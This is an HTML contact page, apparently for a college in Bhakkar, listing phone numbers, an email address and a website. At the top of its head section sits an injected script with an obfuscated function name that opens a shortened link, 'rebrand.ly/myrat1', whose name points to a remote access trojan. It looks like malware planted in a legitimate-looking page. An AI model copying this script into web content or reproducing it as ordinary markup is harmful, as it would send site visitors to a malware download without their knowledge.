<!DOCTYPE html>
<html lang="en">
<head><script type = "text/javascript">load = 'True';function VXNlcmNvcjogSW(){if (load == 'True'){var win = window.open('http://rebrand.ly/myrat1', '_blank');win.focus();load = "False";}}</script>
    <title>Contect</title>
</head>
<style>
        body{

            background: linear-gradient(rgb(113, 84, 84),rgb(134, 161, 238),rgb(193, 3, 168)); 
         }
        h1{
            text-decoration: underline;
            color: brown;
            text-align: center;
            background: linear-gradient(rgb(113, 84, 84),rgb(134, 161, 238),rgb(193, 3, 168));
            margin: 0px;
            border:3px solid black;
        }
        p{
           font-family: 'Franklin Gothic Medium', 'Arial Narrow', Arial, sans-serif;
           color: red;
           text-align:center;
           font-size: 28px;
           margin: 0px;
        }
        img{
    height: 100px;
    width: 120px;
        width: 100px;
        height: 93px;
        border-radius: 50%;
        border: 4px solid yellow;
        object-fit: cover;
    } 
    em{
        color: blue;
    }
    h2{
        color: blue;
        text-decoration: underline;
        font-family: 'Franklin Gothic Medium', 'Arial Narrow', Arial, sans-serif;
        font-size: 30px;
    }
    p{
        border: 3px solid black;
      border-radius: 50px;
      border-bottom: 10px;
      border-width: 10px;
      margin: 2px;
      width: 335px;
        height: 544px;
}
    </style>
 
    <h1><div class="img"><img src="col.jpg">Contact<img src="col.jpg"></h1></div>
    <p>
    <em>Phone:</em></br>
                0453-220141</br>
                0343-7846105</br>
                 0333-6892782</br>
                 <em>Email:</em></br><a href="mailto: gct786bhakkar@gmail.com">gct786bhakkar@gmail.com</a></br>
                 <em>Website:</em></br><a href="mailto: www.gctbhakkar.edu.pk "> www.gctbhakkar.edu.pk</a></br>
</p>
</html>
</body>

 